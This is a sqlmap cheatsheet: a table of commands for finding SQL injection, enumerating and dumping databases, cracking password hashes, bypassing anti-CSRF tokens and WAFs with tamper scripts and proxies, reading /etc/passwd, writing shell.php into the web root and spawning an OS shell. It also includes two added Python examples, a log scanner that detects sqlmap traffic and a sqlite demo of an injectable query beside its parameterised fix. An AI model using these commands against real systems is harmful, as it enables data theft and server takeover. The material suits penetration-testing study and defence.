Sqlmap Cheatsheet

The document describes various commands and parameters that can be used with the sqlmap tool for automating SQL injection and database takeover. It provides examples of using sqlmap to test for SQL injection vulnerabilities, enumerate database and table information, dump database table contents, bypass web application firewalls and anti-CSRF tokens, leverage SQL injection to read and write local files, and spawn an operating system shell. The document also explains options for customizing the sqlmap behavior, such as specifying injection techniques, tampering scripts, and modifying detection settings to find more complex vulnerabilities.

| **Command** | **Description** |
| --- | --- |
| `sqlmap -h` | View the basic help menu |
| `sqlmap -hh` | View the advanced help menu |
| `sqlmap -u "http://www.example.com/vuln.php?id=1" --batch` | Run `SQLMap` without asking for user input |
| `sqlmap 'http://www.example.com/' --data 'uid=1&name=test'` | `SQLMap` with POST request |
| `sqlmap 'http://www.example.com/' --data 'uid=1*&name=test'` | POST request specifying an injection point with an asterisk |
| `sqlmap -r req.txt` | Passing an HTTP request file to `SQLMap` |
| `sqlmap ... --cookie='PHPSESSID=ab4530f4a7d10448457fa8b0eadac29c'` | Specifying a cookie header |
| `sqlmap -u www.target.com --data='id=1' --method PUT` | Specifying a PUT request |
| `sqlmap -u "http://www.target.com/vuln.php?id=1" --batch -t /tmp/traffic.txt` | Store traffic to an output file |
| `sqlmap -u "http://www.target.com/vuln.php?id=1" -v 6 --batch` | Specify verbosity level |
| `sqlmap -u "www.example.com/?q=test" --prefix="%'))" --suffix="-- -"` | Specifying a prefix or suffix |
| `sqlmap -u www.example.com/?id=1 -v 3 --level=5` | Specifying the level and risk |
| `sqlmap -u "http://www.example.com/?id=1" --banner --current-user --current-db --is-dba` | Basic DB enumeration |
| `sqlmap -u "http://www.example.com/?id=1" --tables -D testdb` | Table enumeration |
| `sqlmap -u "http://www.example.com/?id=1" --dump -T users -D testdb -C name,surname` | Table/row enumeration |
| `sqlmap -u "http://www.example.com/?id=1" --dump -T users -D testdb --where="name LIKE 'f%'"` | Conditional enumeration |
| `sqlmap -u "http://www.example.com/?id=1" --schema` | Database schema enumeration |
| `sqlmap -u "http://www.example.com/?id=1" --search -T user` | Searching for data |
| `sqlmap -u "http://www.example.com/?id=1" --passwords --batch` | Password enumeration and cracking |
| `sqlmap -u "http://www.example.com/" --data="id=1&csrf-token=WfF1szMUHhiokx9AHFply5L2xAOfjRkE" --csrf-token="csrf-token"` | Anti-CSRF token bypass |
| `sqlmap --list-tampers` | List all tamper scripts |
| `sqlmap -u "http://www.example.com/case1.php?id=1" --is-dba` | Check for DBA privileges |
| `sqlmap -u "http://www.example.com/?id=1" --file-read "/etc/passwd"` | Reading a local file |
| `sqlmap -u "http://www.example.com/?id=1" --file-write "shell.php" --file-dest "/var/www/html/shell.php"` | Writing a file |
| `sqlmap -u "http://www.example.com/?id=1" --os-shell` | Spawning an OS shell |

--batch = Never ask for user input, use the default behaviour
--dump = Dump DBMS database table entries
--dump-all = Dump all DBMS databases' table entries
--randomize=rp = Randomize the value of the named parameter before it is sent. E.g., sqlmap -u "http://www.example.com/?id=1&rp=29125" --randomize=rp --batch -v 5 | grep URI
--proxy = Use a proxy. E.g., --proxy="socks4://177.39.187.70:33283"
--proxy-file = Use a file containing a list of proxies
--skip-waf = Skip the initial WAF test
--random-agent = Use a random User-Agent header
--chunked = Split the POST request's body into so-called "chunks" (chunked transfer encoding)
--tamper = Use tamper scripts. E.g., --tamper=between,randomcase
--fresh-queries = Redo the queries for this run instead of reusing results stored in the session file

--technique = To specify the SQLi technique to be used E.g., --technique=BEU


B: Boolean-based blind
E: Error-based
U: Union query-based
S: Stacked queries
T: Time-based blind
Q: Inline queries

--eval = Use Python code to calculate a parameter before it is sent. E.g., sqlmap -u "http://www.example.com/?id=1&h=c4ca4238a0b923820dcc509a6f75849b" --eval="import hashlib; h=hashlib.md5(id).hexdigest()" --batch -v 5 | grep URI
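Several of the options above (--random-agent, --tamper=between,randomcase, --chunked) exist to make sqlmap's traffic less recognisable, which is the flip side of what a defender looks for in web-server logs. The following is an added example, not from the cheatsheet: a small Python scanner over constructed Apache-style access-log lines that flags sqlmap's default User-Agent, and URL-decodes and lower-cases the query string before matching so that the randomcase tamper does not hide a UNION SELECT and the NOT BETWEEN rewriting characteristic of the between tamper is still caught. The log lines, IP addresses and pattern list are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Constructed Apache combined-format lines for illustration; not real traffic.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /vuln.php?id=1 HTTP/1.1" 200 512 "-" "sqlmap/1.7#stable (https://sqlmap.org)"',
    '10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /vuln.php?id=1%20AND%201%20NOT%20BETWEEN%200%20AND%201 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /vuln.php?id=1%27%20uNiOn%20SeLeCt%20NULL,NULL--%20- HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /vuln.php?id=42 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'\d+ \d+ "[^"]*" "(?P<ua>[^"]*)"$'
)

# Matched against the URL-decoded, lower-cased query string, so mixed-case
# keywords (randomcase tamper) and %20 encoding do not evade them.
PAYLOAD_RES = [
    ("between-tamper", re.compile(r"\bnot between 0 and\b")),
    ("union-select", re.compile(r"\bunion\s+(all\s+)?select\b")),
    ("boolean-blind", re.compile(r"\b(and|or)\s+\d+\s*=\s*\d+\b")),
]

def analyze(line):
    """Return {'ip', 'path', 'findings'} for one log line, or None if unparsable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    findings = []
    # sqlmap identifies itself unless --random-agent or --user-agent is used.
    if m["ua"].lower().startswith("sqlmap/"):
        findings.append("default-sqlmap-ua")
    query = m["path"].partition("?")[2]
    decoded = unquote_plus(query).lower()
    for name, rx in PAYLOAD_RES:
        if rx.search(decoded):
            findings.append(name)
    return {"ip": m["ip"], "path": m["path"], "findings": findings}

def scan(lines):
    """Keep only the lines that produced at least one finding."""
    return [r for r in (analyze(l) for l in lines) if r and r["findings"]]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit["ip"], hit["findings"], hit["path"])
```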

--level 5
--risk 5
By default, SQLMap combines a predefined set of the most common boundaries (i.e.,
prefix/suffix pairs) with the vectors that have a high chance of success against a
vulnerable target.
Nevertheless, users can enable the bigger sets of boundaries and vectors that are
already built into SQLMap.
For such cases, the options --level and --risk should be used:

The option --level (1-5, default 1) extends both vectors and boundaries being used,
based on their expectancy of success (i.e., the lower the expectancy, the higher
the level).

The option --risk (1-3, default 1) extends the used vector set based on their risk
of causing problems at the target side (i.e., risk of database entry loss or
denial-of-service).

--union-cols=X
--union-char='x'
In some cases, UNION SQLi payloads require extra user-provided information to work.
If we can manually find the exact number of columns of the vulnerable SQL query, we
can provide this number to SQLMap with the option --union-cols (e.g.
--union-cols=17). In case the default "dummy" filling values used by SQLMap (NULL
and a random integer) are not compatible with the values returned by the vulnerable
SQL query, we can specify an alternative value instead (e.g. --union-char='a').
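The column-count requirement above is a property of the DBMS, not of SQLMap. As an added example (not part of the cheatsheet), the Python/sqlite3 script below uses a constructed schema to show the classic string-concatenation sink beside its parameterised form: a UNION whose right-hand SELECT has the wrong number of columns is rejected by the database, which is the trial-and-error that --union-cols lets SQLMap skip, while the bound-parameter version treats the same input as a plain value.

```python
import sqlite3

def make_db():
    """Constructed in-memory schema for illustration (not from the cheatsheet)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products(id INTEGER, name TEXT, price INTEGER);
        INSERT INTO products VALUES (1, 'apple', 3), (2, 'pear', 4);
        CREATE TABLE users(id INTEGER, name TEXT, surname TEXT);
        INSERT INTO users VALUES (1, 'frank', 'fisher');
    """)
    return conn

def vulnerable_lookup(conn, id_param):
    """The sink: the parameter is pasted into the SQL text, so everything after
    the number is executed as SQL (the 'before' of the fix)."""
    sql = "SELECT id, name, price FROM products WHERE id=" + id_param
    return conn.execute(sql).fetchall()

def safe_lookup(conn, id_param):
    """Hardened form: a bound parameter is always a value, never SQL syntax."""
    sql = "SELECT id, name, price FROM products WHERE id=?"
    return conn.execute(sql, (id_param,)).fetchall()

def union_probe(conn, n_cols):
    """Why the column count matters: the DBMS rejects a UNION whose two SELECTs
    differ in width. NULL is the same 'dummy' filler the text mentions."""
    filler = ",".join(["NULL"] * n_cols)
    try:
        vulnerable_lookup(conn, "1 UNION SELECT " + filler)
        return "accepted"
    except sqlite3.OperationalError:
        return "column mismatch"

if __name__ == "__main__":
    db = make_db()
    print(union_probe(db, 2), "/", union_probe(db, 3))
    print(vulnerable_lookup(db, "1 UNION SELECT id, name, surname FROM users"))
    print(safe_lookup(db, "1 UNION SELECT id, name, surname FROM users"))
```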